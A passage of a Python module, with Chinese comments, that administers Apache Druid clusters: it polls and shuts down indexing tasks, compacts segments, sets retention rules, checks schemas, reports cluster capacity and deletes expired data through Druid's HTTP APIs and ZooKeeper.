:param task_id: index task的id
:return: index task的状态
"""
# 获取segments信息:curl -XGET http://{router_ip:port}/druid/coordinator/v1/datasources/{datasource}
status_url = f"http://{overlord}/druid/indexer/v1/task/{task_id}/status"
# 5种状态:RUNNING, PENDING, WAITING, SUCCESS, FAILED
ok, status = get(status_url)
if not ok:
return UNKNOWN
logger.info(f"task_id: {task_id}, status_url: {status_url}, status: {status}")
runner_status = status[STATUS][STATUS]
if druid_version == DRUID_VERSION_V1:
return runner_status
else:
return runner_status if runner_status in [SUCCESS, FAILED] else status[STATUS]["runnerStatusCode"]
def shutdown_index_task(overlord, task_id):
"""
强制关闭指定task_id的任务状态,会导致丢peon数据, 谨慎使用
:param overlord: overlord角色,形式ip:port
:param task_id: index task的id
:return: index task的状态
"""
# 关闭任务:curl -XPOST http://{router_ip:port}/druid/overlord/v1/task/{task_id}/shutdown
shutdown_url = f"http://{overlord}/druid/indexer/v1/task/{task_id}/shutdown"
# 尽最大努力关闭druid index task, 重试3次
for i in range(3):
try:
resp = requests.post(shutdown_url, headers=JSON_HEADERS, timeout=HTTP_REQUEST_TIMEOUT)
if resp.status_code == 200:
break
except Exception:
logger.error(
f"{i} times, shutdown index task failed with task_id: {task_id}, shutdown_url: {shutdown_url}, "
f"resp.text: {resp.text}"
)
def merge_segments(zk_addr, datasource, begin_date, end_date, druid_version, timeout, merge_days):
"""
按照天级合并指定数据源的指定时间范围的segments
:param merge_days: 合并天数
:param zk_addr: zk连接信息
:param datasource: 合作操作的datasource
:param begin_date: 合并操作的开始日期
:param end_date: 合并操作的结束日期
:param druid_version: druid集群版本
:param timeout: merge任务执行超时时间,单位分钟
"""
coordinator = _get_role_leader(zk_addr, COORDINATOR, druid_version)
# 检查是否需要Merge
if not should_merge(coordinator, datasource, begin_date, end_date, merge_days):
return
interval = f"{begin_date}/{end_date}"
overlord = _get_role_leader(zk_addr, OVERLORD, druid_version)
execute_task(DRUID_COMPACT_SEGMENTS_TASK_CONFIG_TEMPLATE, overlord, datasource, interval, druid_version, timeout)
def execute_task(task_template, overlord, datasource, interval, druid_version, timeout=60):
"""
:param task_template: task config模板
:param overlord: overlord leader进程 ip:port格式
:param datasource: druid datasource名称
:param interval: 时间区间
:param druid_version: druid集群版本
:param timeout: 任务执行超时时间,单位分钟
"""
data = Template(task_template)
context = Context({DATASOURCE: datasource, INTERVAL: interval})
body = data.render(context)
task_url = f"http://{overlord}/druid/indexer/v1/task"
ok, task = post(task_url, params=json.loads(body))
task_id = task["task"] if ok else ""
logger.info(
f"datasource: {datasource}, overlord: {overlord}, interval: {interval}, task config: {body}, task_id: {task_id}"
)
begin_time = datetime.now()
time_delta = timedelta(minutes=timeout)
while True:
time.sleep(10)
status = get_task_status(overlord, task_id, druid_version)
if status == RUNNING:
if datetime.now() - begin_time > time_delta:
shutdown_index_task(overlord, task_id)
logger.warning(f"datasource: {datasource}, task_id {task_id} timeout, has been shutdown")
return
elif status in [PENDING, WAITING]:
shutdown_index_task(overlord, task_id)
return
else:
return
def clean_unused_segments(cluster_name, druid_version, timeout=60):
"""
清理的单个集群的
:param cluster_name: 集群名
:param druid_version: druid集群版本
:param timeout: clean任务执行超时时间,单位分钟
:return:
"""
coordinator = get_leader(cluster_name, COORDINATOR)
ok, datasources_all = get(f"http://{coordinator}{ENDPOINT_GET_ALL_DATASOURCES}")
if not ok or not datasources_all:
return False
ok, datasources_used = get(f"http://{coordinator}{ENDPOINT_GET_DATASOURCES}")
if not ok:
return False
logger.info(f"datasources_all: {datasources_all}, datasources_used: {datasources_used}")
for datasource in datasources_all:
try:
begin_date, end_date = "1000-01-01", "3000-01-01"
if datasource in datasources_used:
coordinator = get_leader(cluster_name, COORDINATOR)
ok, resp = get(f"http://{coordinator}/druid/coordinator/v1/datasources/{datasource}/")
if not ok:
continue
end_date = (
datetime.strptime(resp[SEGMENTS][MINTIME], "%Y-%m-%dT%H:%M:%S.000Z") - timedelta(CLEAN_DELTA_DAY)
).strftime("%Y-%m-%d")
interval = f"{begin_date}/{end_date}"
overlord = get_leader(cluster_name, OVERLORD)
logger.info(f"datasource: {datasource}, overlord: {overlord}, interval: {interval}")
execute_task(
DRUID_CLEAN_DEEPSTORAGE_TASK_CONFIG_TEMPLATE, overlord, datasource, interval, druid_version, timeout
)
except Exception:
logger.warning(f"clean unused segments failed for datasource {datasource}", exc_info=True)
return True
def should_merge(coordinator, datasource, begin_date, end_date, merge_days=MERGE_DAYS_DEFAULT):
"""
判断指定数据源的指定时间范围的segments是否需要合并,interval是一天, 下列条件下不需要merge,
1) 平均segment size大于300MB
2) 平均每天的segment文件数量小于2
:param merge_days: 合并天数
:param coordinator: coordinator角色leader节点
:param datasource: druid数据源名称
:param begin_date: merge时间区间的左边界
:param end_date: merge时间区间的右边界
:return:
"""
segments_url = (
f"http://{coordinator}/druid/coordinator/v1/datasources/{datasource}/intervals/"
f"{begin_date}_{end_date}?simple"
)
ok, segments = get(segments_url)
# segments是按天合并的,预期合并后每天至多一个segment
if not ok or len(segments) <= merge_days:
return False
size = 0
file_count = 0
for value in segments.values():
size += value[SIZE]
file_count += value[COUNT]
logger.info(
f"datasource: {datasource}, segments_url: {segments_url}, segments: {segments}, size: {size}, "
f"file_count: {file_count}, status: True"
)
if file_count <= 1 or size > MERGE_BYTES_LIMIT:
return False
return True
def alter(rt_info):
"""
修改rt的druid存储相关信息
:param rt_info: rt的字段和配置信息
:return: rt的druid存储的变更结果
"""
return prepare(rt_info)
def prepare(rt_info):
"""
准备rt关联的druid存储(创建新库表或旧表新增字段)
:param rt_info: rt的配置信息
:return: True/False
"""
return True
def maintain_merge_segments(zk_addr, physical_tn, expires_day, delta_day, druid_version, timeout, merge_days):
"""
用于在maintain和maintain_all中执行的merge segment逻辑
:param zk_addr: zk连接信息
:param physical_tn: 物理表名
:param expires_day: 数据保留天数
:param delta_day: 跳过的天数
:param druid_version : druid 集群版本
:param timeout : druid 任务的执行超时时间
"""
expires_date = (datetime.today() - timedelta(expires_day)).strftime("%Y-%m-%d")
end_date = (datetime.today() - timedelta(delta_day)).strftime("%Y-%m-%d")
begin_date = (datetime.today() - timedelta(delta_day + merge_days)).strftime("%Y-%m-%d")
logger.info(
f"physical_tn: {physical_tn}, expires_day: {expires_day}, begin_date: {begin_date}, end_date: {end_date}"
)
if end_date >= expires_date:
merge_segments(zk_addr, physical_tn, begin_date, end_date, druid_version, timeout, merge_days)
def set_retain_rule(coordinator, cluster_name, physical_tn, expires_day, druid_version):
"""
设置druid datasource的数据保留规则
:param coordinator: coordinator角色leader, 格式hostname:port
:param cluster_name: 集群名称
:param physical_tn: 物理表名
:param expires_day: 数据保留天数
:param druid_version: druid集群版本
:return: 数据保留规则是否设置成功,True or False
"""
rules = build_retain_rule(druid_version, expires_day)
url = f"http://{coordinator}/druid/coordinator/v1/rules/{physical_tn}"
resp = requests.post(url, data=rules, headers=JSON_HEADERS)
if resp.status_code != 200:
logger.warning(
f"{cluster_name}: failed to set retention rule for datasource {physical_tn}. "
f"status_code: {resp.status_code}, response: {resp.text}"
)
return False
return True
def build_retain_rule(druid_version, expires_day):
"""
构建数据保留规则
:param expires_day: 数据保留天数
:param druid_version: druid集群版本
:return: json字符串
"""
load_rule = {
PERIOD: f"P{expires_day}D",
"includeFuture": True,
"tieredReplicants": {"_default_tier": 2},
TYPE: "loadByPeriod",
}
if druid_version == DRUID_VERSION_V1:
load_rule["tieredReplicants"]["tier_hot"] = 2
rules = [load_rule, {"type": "dropForever"}]
return json.dumps(rules)
def kill_waiting_tasks(cluster_name):
"""
kill druid集群的所有waiting状态的任务
:param cluster_name: 集群名
"""
try:
overlord = get_leader(cluster_name, OVERLORD)
waiting_tasks_url = "http://" + overlord + "/druid/indexer/v1/waitingTasks"
res = requests.get(waiting_tasks_url, verify=False, timeout=HTTP_REQUEST_TIMEOUT)
pending_tasks = json.loads(res.text, encoding="utf-8")
for task_json in pending_tasks:
kill_task_url = "http://" + overlord + "/druid/indexer/v1/task/" + task_json[ID] + "/shutdown"
headers = JSON_HEADERS
requests.post(kill_task_url, headers=headers, verify=False)
except Exception:
logger.warning("failed to kill waiting tasks", exc_info=True)
def kill_pending_tasks(cluster_name):
"""
kill druid集群的所有pending状态的任务
:param cluster_name: 集群名
"""
try:
overlord = get_leader(cluster_name, OVERLORD)
pending_tasks_url = "http://" + overlord + "/druid/indexer/v1/pendingTasks"
res = requests.get(pending_tasks_url, verify=False, timeout=HTTP_REQUEST_TIMEOUT)
pending_tasks = json.loads(res.text, encoding="utf-8")
for task_json in pending_tasks:
kill_task_url = "http://" + overlord + "/druid/indexer/v1/task/" + task_json[ID] + "/shutdown"
headers = JSON_HEADERS
requests.post(kill_task_url, headers=headers, verify=False)
except Exception:
logger.warning("failed to kill pending tasks", exc_info=True)
def maintain(rt_info, delta_day=MAINTAIN_DELTA_DAY, timeout=EXECUTE_TIMEOUT, merge_days=MERGE_DAYS_DEFAULT):
"""
根据用户设定的数据保留时间维护druid表数据保留规则
:param merge_days: 合并天数
:param rt_info: rt的配置信息
:param delta_day: merge segments的日期偏移量
:param timeout: druid index任务的执行超时时间
"""
druid, physical_tn, conn_info = _get_druid_storage_info(rt_info)
cluster_name, version = druid[STORAGE_CLUSTER][CLUSTER_NAME], druid[STORAGE_CLUSTER][VERSION]
coordinator = get_leader(cluster_name, COORDINATOR)
expires_day = translate_expires_day(druid[EXPIRES])
# 设置数据保留规则
set_retain_rule(coordinator, cluster_name, physical_tn, expires_day, version)
# merge segments
zk_addr = conn_info[ZOOKEEPER_CONNECT]
maintain_merge_segments(zk_addr, physical_tn, expires_day, delta_day, version, timeout, merge_days)
return True
def maintain_all(delta_day=MAINTAIN_DELTA_DAY):
"""
根据用户设定的数据保留时间维护druid表数据保留规则
"""
start = time.time()
# rt维度的mantain, 主要是设置数据保存时间
storage_rt_list = model_manager.get_storage_rt_objs_by_type(DRUID)
for rt_storage in storage_rt_list:
try:
conn_info = json.loads(rt_storage.storage_cluster_config.connection_info)
zk_addr = conn_info[ZOOKEEPER_CONNECT]
coordinator = _get_role_leader(zk_addr, COORDINATOR, rt_storage.storage_cluster_config.version)
expires_day = translate_expires_day(rt_storage.expires)
physical_tn = rt_storage.physical_table_name
cluster_name = rt_storage.storage_cluster_config.cluster_name
# 设置数据保留规则
set_retain_rule(
coordinator, cluster_name, physical_tn, expires_day, rt_storage.storage_cluster_config.version
)
except Exception:
logger.warning(
f"{rt_storage.storage_cluster_config.cluster_name}: failed to maintain the retention rule of "
f"datasource {rt_storage.physical_table_name}",
exc_info=True,
)
set_rule_finish = time.time()
# 集群维度的maintain, 功能是清理deepstorage和compact segments
cluster_list = model_manager.get_storage_cluster_configs_by_type(DRUID)
check_threads = []
for cluster in cluster_list:
cluster_name = cluster[CLUSTER_NAME]
thread = threading.Thread(target=maintain_druid_cluster, name=cluster_name, args=(cluster_name,))
# 设置线程为守护线程,主线程结束后,结束子线程
thread.setDaemon(True)
check_threads.append(thread)
thread.start()
# join所有线程,等待所有集群检查都执行完毕
# 设置超时时间,防止集群出现问题,一直阻塞,导致后续集群维护任务等待
for th in check_threads:
th.join(timeout=DRUID_MAINTAIN_TIMEOUT)
end = time.time()
logger.info(
f"druid maintain_all total time: {end - start}(s), set rule take {set_rule_finish - start}(s), "
f"cluster maintain takes {end - set_rule_finish}(s)"
)
return True
def maintain_druid_cluster(cluster_name):
"""
对单个集群串行maintain其rt, 清理rt在deepstorage上的无用数据和合并小segment
:param cluster_name: 集群名称
"""
cluster = model_manager.get_storage_cluster_config(cluster_name, DRUID)
version = cluster[VERSION]
clean_unused_segments(cluster_name, version, EXECUTE_TIMEOUT)
# 对于0.11 druid版,无法执行compact操作
if version == DRUID_VERSION_V2:
segments_compaction(cluster_name, MAINTAIN_DELTA_DAY, MERGE_DAYS_DEFAULT, EXECUTE_TIMEOUT)
logger.info(
"{cluster_name}: maintain_druid_cluster total time: {end - start}(s), clean_unused_segments task "
"{clean_finish - start}(s), compaction takes {end - clean_finish}(s)"
)
def check_schema(rt_info):
"""
校验RT的字段(名字、类型)的修改是否满足存储的限制
:param rt_info: rt的配置信息
:return: rt字段和存储字段的schema对比
"""
result = {RT_FIELDS: {}, "druid_fields": {}, CHECK_RESULT: True, CHECK_DIFF: {}}
for field in rt_info[FIELDS]:
if field[FIELD_NAME].lower() in EXCEPT_FIELDS:
continue
result[RT_FIELDS][field[FIELD_NAME]] = field[FIELD_TYPE]
_, physical_tn, conn_info = _get_druid_storage_info(rt_info)
broker_host, broker_port = conn_info[HOST], conn_info[PORT]
druid_schema_url = f"http://{broker_host}:{broker_port}/druid/v2/sql/"
druid_schema_sql = (
'{"query": "SELECT COLUMN_NAME, DATA_TYPE FROM INFORMATION_SCHEMA.COLUMNS '
"WHERE TABLE_NAME = '%s'\"}" % physical_tn
)
ok, druid_schema = post(druid_schema_url, params=json.loads(druid_schema_sql))
if not ok or not druid_schema:
return result
logger.info(f"physical_tn: {physical_tn}, druid_schema_url: {druid_schema_url}, druid_schema: {druid_schema}")
for e in druid_schema:
result["druid_fields"][e["COLUMN_NAME"].lower()] = e["DATA_TYPE"].lower()
append_fields, bad_fields = check_rt_druid_fields(result[RT_FIELDS], result["druid_fields"])
result[CHECK_DIFF] = {APPEND_FIELDS: append_fields, BAD_FIELDS: bad_fields}
if bad_fields:
result[CHECK_RESULT] = False
logger.info(f"diff result: {result}")
return result
def check_rt_druid_fields(rt_table_columns, druid_columns):
"""
对比rt的字段,和druid物理表字段的区别
:param rt_table_columns: rt的字段转换为druid中字段后的字段信息
:param druid_columns: druid物理表字段
:return: (append_fields, bad_fields),需变更增加的字段 和 有类型修改的字段
"""
append_fields, bad_fields = [], []
for key, value in rt_table_columns.items():
col_name, col_type = key.lower(), value.lower()
if druid_columns[col_name]:
# 再对比类型
druid_col_type = druid_columns[col_name]
ok = (
(col_type == druid_col_type)
or (col_type == STRING and druid_col_type == VARCHAR)
or (col_type == LONG and druid_col_type == BIGINT)
)
if not ok:
bad_fields.append({col_name: f"difference between rt and druid({col_type} != {druid_col_type})"})
else:
append_fields.append({FIELD_NAME: col_name, FIELD_TYPE: col_type})
return append_fields, bad_fields
def clusters():
"""
获取druid存储集群列表
:return: druid存储集群列表
"""
result = model_manager.get_storage_cluster_configs_by_type(DRUID)
return result
def create_task(rt_info):
"""
创建任务
:param rt_info: rt的配置信息
:return: 创建task
"""
druid, physical_tn, conn_info = _get_druid_storage_info(rt_info)
zk_addr = conn_info.get(ZOOKEEPER_CONNECT)
overlord = _get_role_leader(zk_addr, OVERLORD, druid[STORAGE_CLUSTER][VERSION])
task_config = _get_task_config(rt_info)
url = f"http://{overlord}{ENDPOINT_RUN_TASK}"
result, resp = post(url=url, params=json.loads(task_config))
if not result or not resp[TASK]:
logger.error(f"create task error, url: {url}, param: {task_config}, result: {resp}")
raise DruidCreateTaskErrorException(message_kv={RESULT_TABLE_ID: rt_info[RESULT_TABLE_ID]})
# 获取正在执行的该任务地址
task_id = resp[TASK]
# 轮询结果
return _get_task_location(overlord, task_id)
def _get_task_location(overlord, task_id, max_times=3):
"""
:param overlord: overlord 节点
:param task_id: 任务id
:param max_times: 最大超时时间
:return: 任务地址
"""
if max_times < 0:
return ""
running_tasks = _get_tasks(overlord, TASK_TYPE_RUNNING)
for task in running_tasks:
if task[ID] == task_id:
task_location = f"http://{task[LOCATION][HOST]}:{task[LOCATION][PORT]}{ENDPOINT_PUSH_EVENTS}"
return task_location
time.sleep(5)
max_times = max_times - 1
return _get_task_location(overlord, task_id, max_times)
def shutdown_task(rt_info):
"""
:param rt_info: 结果表信息
:return: 停止成功或者失败
"""
druid, physical_tn, conn_info = _get_druid_storage_info(rt_info)
zk_addr = conn_info[ZOOKEEPER_CONNECT]
overlord = _get_role_leader(zk_addr, OVERLORD, druid[STORAGE_CLUSTER][VERSION])
return _shutdown_task_with_retry(overlord, physical_tn)
def _shutdown_task_with_retry(overlord, data_source, max_times=3):
"""
停止任务
:param overlord: overlord 节点
:param data_source: 数据源
:param max_times: 最大次数
:return: 停止task
"""
if max_times < 0:
raise DruidShutDownTaskException(message_kv={MESSAGE: "shut down overtime"})
running_tasks = _get_tasks(overlord, TASK_TYPE_RUNNING)
pending_tasks = _get_tasks(overlord, TASK_TYPE_PENDING)
tasks = running_tasks + pending_tasks
counter = 0
for task in tasks:
if task[ID].find(data_source) > 0:
peon_url = f"http://{task[LOCATION][HOST]}:{task[LOCATION][PORT]}{ENDPOINT_SHUTDOWN_TASK}"
resp = requests.post(peon_url)
logger.info(f"shutdown task info, url: {peon_url}, result: {resp.content}")
if resp.status_code != 200:
logger.error(f"shutdown task exception, {resp}")
raise DruidShutDownTaskException(message_kv={MESSAGE: resp})
logger.info(f"shutdown task success, peon_url: {peon_url}, task_id: {task[ID]}")
else:
counter = counter + 1
if counter == len(tasks):
return True
time.sleep(5)
max_times = max_times - 1
return _shutdown_task_with_retry(overlord, data_source, max_times)
def _get_druid_storage_info(rt_info):
"""
获取存储基本信息
:param rt_info: rt的信息
:return: druid, physical_tn, conn_info
"""
druid = rt_info[STORAGES][DRUID]
physical_tn = druid[PHYSICAL_TABLE_NAME]
conn_info = json.loads(druid[STORAGE_CLUSTER][CONNECTION_INFO])
return (
druid,
physical_tn,
conn_info,
)
def _get_role_leader(zk_addr, zk_node, druid_version):
"""
:param zk_addr: zk连接信息
:param zk_node: zk节点类型
:param druid_version: Druid版本
:return: 获取leader
"""
path = f"{ZK_DRUID_PATH}/{zk_node.lower() if druid_version == DRUID_VERSION_V1 else zk_node.upper()}"
zk = KazooClient(hosts=zk_addr, read_only=True)
zk.start()
result = zk.get_children(path)
zk.stop()
if not result or len(result) == 0:
logger.error(f"not found any zk path {path}, or this path is empty")
raise DruidZkConfException()
role = random.sample(result, 1)[0]
if zk_node in ["overlord", "OVERLORD"]:
leader_url = f"http://{role}/druid/indexer/v1/leader"
elif zk_node in ["coordinator", "COORDINATOR"]:
leader_url = f"http://{role}/druid/coordinator/v1/leader"
else:
logger.error(f"the zk path {path} is not for overlord or coordinator, please input a correct path")
raise DruidZKPathException()
resp = requests.get(leader_url, timeout=HTTP_REQUEST_TIMEOUT)
if resp.status_code != 200:
logger.error(f"failed to get leader from url: {leader_url}")
raise DruidHttpRequestException()
leader = resp.text.strip("http://")
return leader
def _get_task_config(rt_info):
"""
:param rt_info: 结果表信息
:return: 获取Druid 任务配置
"""
druid, physical_tn, conn_info = _get_druid_storage_info(rt_info)
task_config_dict = {
"availability_group": f"availability-group-{str(uuid.uuid4())[0:8]}",
"required_capacity": DEFAULT_TASK_MEMORY,
"data_source": physical_tn,
"metrics_spec": _get_dimensions_and_metrics(rt_info)["metrics_fields"],
"segment_granularity": DEFAULT_SEGMENT_GRANULARITY,
"timestamp_column": DEFAULT_TIMESTAMP_COLUMN,
"dimensions_spec": _get_dimensions_and_metrics(rt_info)["dimensions_fields"],
"dimension_exclusions": [],
"max_idle_time": DEFAULT_MAX_IDLE_TIME,
"window_period": DEFAULT_WINDOW_PERIOD,
"partition_num": random.randint(1, INT_MAX_VALUE),
"context": {
"druid.indexer.fork.property.druid.processing.buffer.sizeBytes": DEFAULT_TASK_MEMORY * 1024 * 1024 / 11,
"druid.indexer.runner.javaOpts": "-Xmx%dM -XX:MaxDirectMemorySize=%dM"
% (DEFAULT_TASK_MEMORY * 6 / 11 + 1, DEFAULT_TASK_MEMORY * 5 / 11 + 1),
},
}
task_config = TASK_CONFIG_TEMPLATE.format(**task_config_dict).replace("'", '"')
return task_config
def _get_dimensions_and_metrics(rt_info):
"""
:param rt_info: 结果表信息
:return: 返回纬度和度量字段
"""
druid, physical_tn, conn_info = _get_druid_storage_info(rt_info)
storage_config = json.loads(druid.get(STORAGE_CONFIG, "{}"))
dimensions_fields = storage_config.get("dimensions_fields", [])
metrics_fields = storage_config.get("metrics_fields", [])
default_dimensions = [{NAME: str(field[FIELD_NAME]), TYPE: str(field[FIELD_TYPE])} for field in rt_info[FIELDS]]
default_metrics = [{TYPE: "count", NAME: "__druid_reserved_count", "fieldName": ""}]
dimensions_fields = dimensions_fields if dimensions_fields else default_dimensions
metrics_fields = metrics_fields if metrics_fields else default_metrics
return {"dimensions_fields": dimensions_fields, "metrics_fields": metrics_fields}
def _get_tasks(overlord_conn_info, task_type):
"""
:param overlord_conn_info: overlord连接信息
:param task_type: 任务类型
:return: 该任务类型结果集
"""
if task_type not in [TASK_TYPE_RUNNING, TASK_TYPE_PENDING]:
raise NotSupportTaskTypeException(message_kv={TASK_TYPE, task_type})
if task_type == TASK_TYPE_RUNNING:
result, resp = get(f"http://{overlord_conn_info}{ENDPOINT_GET_RUNNING_TASKS}")
else:
result, resp = get(f"http://{overlord_conn_info}{ENDPOINT_GET_PENDING_TASKS}")
if not result:
raise DruidQueryTaskErrorException()
return resp
def get_roles(cluster_name):
"""
:param cluster_name: 集群名称
:return:
"""
cluster = model_manager.get_cluster_obj_by_name_type(cluster_name, DRUID)
conn_info = json.loads(cluster.connection_info)
zk_addr = conn_info[ZOOKEEPER_CONNECT]
zk = KazooClient(hosts=zk_addr, read_only=True)
zk.start()
result = zk.get_children(ZK_DRUID_PATH)
if not result or len(result) == 0:
logger.error("Failed to get overload node")
zk.stop()
raise DruidZkConfException()
data = dict()
for role in result:
data[role] = zk.get_children(f"{ZK_DRUID_PATH}/{role}")
zk.stop()
return data
def get_datasources(cluster_name):
"""
:param cluster_name: 集群名称
:return:
"""
cluster = model_manager.get_cluster_obj_by_name_type(cluster_name, DRUID)
conn_info = json.loads(cluster.connection_info)
zk_addr = conn_info[ZOOKEEPER_CONNECT]
coordinator = _get_role_leader(zk_addr, COORDINATOR, cluster.version)
result, resp = get(f"http://{coordinator}{ENDPOINT_GET_DATASOURCES}")
if not result:
raise DruidQueryDataSourceException(message_kv={MESSAGE: resp})
return resp
def get_workers(cluster_name):
"""
:param cluster_name: 集群名称
:return: workers信息
"""
overlord = get_leader(cluster_name, OVERLORD)
result, resp = get(f"http://{overlord}{ENDPOINT_GET_RUNNING_WORKERS}")
if not result:
raise DruidQueryWorkersException(message_kv={MESSAGE: resp})
return resp
def get_historical(cluster_name):
"""
:param cluster_name: 集群名称
:return: historical容量
"""
coordinator = get_leader(cluster_name, COORDINATOR)
result, resp = get(f"http://{coordinator}{ENDPOINT_HISTORICAL_SIZES}")
if not result:
raise DruidQueryHistoricalException(message_kv={MESSAGE: resp})
return resp
def get_cluster_capacity(cluster_name):
"""
:param cluster_name: 集群名称
:return: 容量信息
"""
cluster_capacity = {
"slot_capacity": 0,
"slot_capacity_used": 0,
"slot_usage": 0,
"used_size": 0,
"max_size": 0,
"storage_usage": 0,
"segments_count": 0,
"timestamp": time.time(),
}
try:
# 获取druid槽位信息
worker_info = get_workers(cluster_name)
if worker_info:
for worker in worker_info:
cluster_capacity["slot_capacity"] = cluster_capacity["slot_capacity"] + worker["worker"]["capacity"]
cluster_capacity["slot_capacity_used"] = (
cluster_capacity["slot_capacity_used"] + worker["currCapacityUsed"]
)
# 获取historical 容量信息
historical_info = get_historical(cluster_name)
if historical_info:
for historical in historical_info:
if historical[TYPE] == "historical":
cluster_capacity["used_size"] = cluster_capacity["used_size"] + historical["currSize"]
cluster_capacity["max_size"] = cluster_capacity["max_size"] + historical["maxSize"]
# 获取segments总数
coordinator = get_leader(cluster_name, COORDINATOR)
datasource_list_url = f"http://{coordinator}/druid/coordinator/v1/datasources/"
ok, datasource_list = get(datasource_list_url)
segments_sum = 0
for physical_tn in datasource_list:
segments_url = f"http://{coordinator}/druid/coordinator/v1/datasources/{physical_tn}"
ok, datasource_meta = get(segments_url)
segments_sum += datasource_meta[SEGMENTS][COUNT]
cluster_capacity["segments_count"] = segments_sum
cluster_capacity["slot_usage"] = (
int(100 * cluster_capacity["slot_capacity_used"] / cluster_capacity["slot_capacity"])
if cluster_capacity["slot_capacity"] > 0
else 0
)
cluster_capacity["storage_usage"] = (
int(100 * cluster_capacity["used_size"] / cluster_capacity["max_size"])
if cluster_capacity["max_size"] > 0
else 0
)
cluster_capacity[TIMESTAMP] = time.time()
except Exception:
logger.warning("failed to execute function druid.get_cluster_capacity", exc_info=True)
return cluster_capacity
def get_table_capacity(conn_info):
"""
读取druid集群容量数据
:param conn_info: 集群链接信息
:return:
"""
url = f"http://{conn_info[HOST]}:{conn_info[PORT]}/druid/v2/sql/"
sql = (
'{"query": "SELECT datasource, sum(size * num_replicas)/1000000 as total_size, sum(num_rows) as total_nums '
'FROM sys.segments WHERE is_available = 1 GROUP BY datasource"} '
)
rt_size = {}
try:
ok, table_capacity_list = post(url, params=json.loads(sql))
if not ok or not table_capacity_list:
return rt_size
for table_capacity in table_capacity_list:
rt_size[table_capacity[DATASOURCE]] = {
TABLE_SIZE_MB: table_capacity["total_size"],
TABLE_RECORD_NUMS: table_capacity["total_nums"],
REPORT_TIME: time.time(),
}
except Exception:
logger.warning("failed to execute function druid.get_table_capacity", exc_info=True)
return rt_size
def get_leader(cluster_name, role_type):
"""
:param cluster_name: 集群名称
:param role_type: 角色类型
:return: overlord or coordinator
"""
cluster = model_manager.get_cluster_obj_by_name_type(cluster_name, DRUID)
conn_info = json.loads(cluster.connection_info)
zk_addr = conn_info[ZOOKEEPER_CONNECT]
return _get_role_leader(zk_addr, role_type, cluster.version)
def get_tasks(cluster_name, task_type):
"""
:param cluster_name: 集群名称
:param task_type: 任务类型
:return:
"""
cluster = model_manager.get_cluster_obj_by_name_type(cluster_name, DRUID)
conn_info = json.loads(cluster.connection_info)
zk_addr = conn_info[ZOOKEEPER_CONNECT]
overlord = _get_role_leader(zk_addr, OVERLORD, cluster.version)
if task_type != TASK_TYPE_RUNNING and task_type != TASK_TYPE_PENDING:
raise NotSupportTaskTypeException(message_kv={TASK_TYPE: task_type})
elif task_type == TASK_TYPE_RUNNING:
result, resp = get(f"http://{overlord}{ENDPOINT_GET_RUNNING_TASKS}")
else:
result, resp = get(f"http://{overlord}{ENDPOINT_GET_PENDING_TASKS}")
if not result:
raise DruidQueryTaskErrorException()
return resp
def update_expires(rt_info, expires):
"""
更新datasource的数据过期规则
:param rt_info: 结果表
:param expires: 过期时间
:return:
"""
druid, physical_tn, conn_info = _get_druid_storage_info(rt_info)
expires = druid.get(EXPIRES, DEFAULT_DRUID_EXPIRES) if not expires else expires
zk_addr = conn_info[ZOOKEEPER_CONNECT]
coordinator = _get_role_leader(zk_addr, COORDINATOR, druid[STORAGE_CLUSTER][VERSION])
rule_path = f"{ENDPOINT_DATASOURCE_RULE}/{physical_tn}"
rule_url = f"http://{coordinator}{rule_path}"
result, resp = get(rule_url)
if not result:
raise DruidQueryExpiresException(message_kv={MESSAGE: f"{physical_tn}获取数据过期时间异常"})
rule = resp
if not rule or len(rule) == 0:
# 没有查询到过期规则,取默认的数据过期规则
rule = DEFAULT_EXPIRES_RULE
# 2 更新data_source中的数据过期时间
rule[0]["period"] = f"P{expires.upper()}"
resp = requests.post(rule_url, json=rule)
if resp.status_code != 200:
raise DruidUpdateExpiresException(message_kv={MESSAGE: f"{physical_tn}更新数据过期时间异常"})
return True
def delete(rt_info, expires):
"""
删除数据
:param rt_info: 结果表
:param expires: 过期时间
:return:
"""
druid, physical_tn, conn_info = _get_druid_storage_info(rt_info)
zk_addr = conn_info[ZOOKEEPER_CONNECT]
expires = druid.get(EXPIRES, "360d") if not expires else expires
overlord = _get_role_leader(zk_addr, OVERLORD, druid[STORAGE_CLUSTER][VERSION])
expires = translate_expires_day(expires)
kill_interval = _get_kill_interval(expires)
task_id = f'kill_{rt_info[RESULT_TABLE_ID]}_{kill_interval.replace("/", "_")}_{str(uuid.uuid4())[0:8]}'
data = {TYPE: "kill", ID: task_id, "dataSource": physical_tn, INTERVAL: kill_interval}
url = f"http://{overlord}{ENDPOINT_RUN_TASK}"
logger.info(f"start delete data, url:{url}, params: {json.dumps(data)}")
result, resp = post(url, data)
if not result:
raise DruidDeleteDataException(message_kv={MESSAGE: resp})
return _check_delete_result(overlord, rt_info[RESULT_TABLE_ID], task_id)
def _get_kill_interval(expires):
"""
获取kill的时间间隔
:param expires: 过期时间
:return:
"""
date_diff = (datetime.today() + timedelta(-expires + 1)).strftime("%Y-%m-%dT00:00:00.000Z")
time_utc = datetime.strptime(date_diff, UTC_FORMAT) - timedelta(hours=TIME_ZONE_DIFF)
return f"{UTC_BEGIN_TIME}/{time_utc.strftime(UTC_FORMAT)}"
def _check_delete_result(overlord, result_table_id, task_id, max_times=60):
"""
:param overlord: overload节点
:param result_table_id: 结果表id
:param task_id: 任务id
:param max_times: 超时次数
:return:
"""
if max_times < 0:
logger.error(f"deleting expired data failed, rt: {result_table_id}, task_id: {task_id}")
raise DruidDeleteDataException(message_kv={MESSAGE: "删除过期数据失败, 超过最大重试次数"})
time.sleep(5)
result, resp = get(f"http://{overlord}{ENDPOINT_RUN_TASK}/{task_id}/status")
if not result:
raise DruidDeleteDataException(message_kv={MESSAGE: "检查任务运行状态异常"})
result = resp
if result.get(STATUS, {}).get(STATUS, "") == SUCCESS:
return True
else:
max_times = max_times - 1
logger.info(f"Enter the next poll, max_times: {max_times}, current result: {result}")
return _check_delete_result(overlord, result_table_id, task_id, max_times)
def segments_compaction(cluster_name, delta_day, merge_days, timeout):
"""
segments合并
:param cluster_name: druid集群名
:param delta_day: 合并跳过的天数
:param merge_days: 合并的天数
:param timeout: 合并操作的超时时间
:return:
"""
cluster = model_manager.get_storage_cluster_config(cluster_name, DRUID)
zk_addr = json.loads(cluster[CONNECTION_INFO])[ZOOKEEPER_CONNECT]
version = cluster[VERSION]
coordinator = _get_role_leader(zk_addr, COORDINATOR, version)
ok, datasources_used = get(f"http://{coordinator}{ENDPOINT_GET_DATASOURCES}")
if not ok:
return False
for datasource in datasources_used:
try:
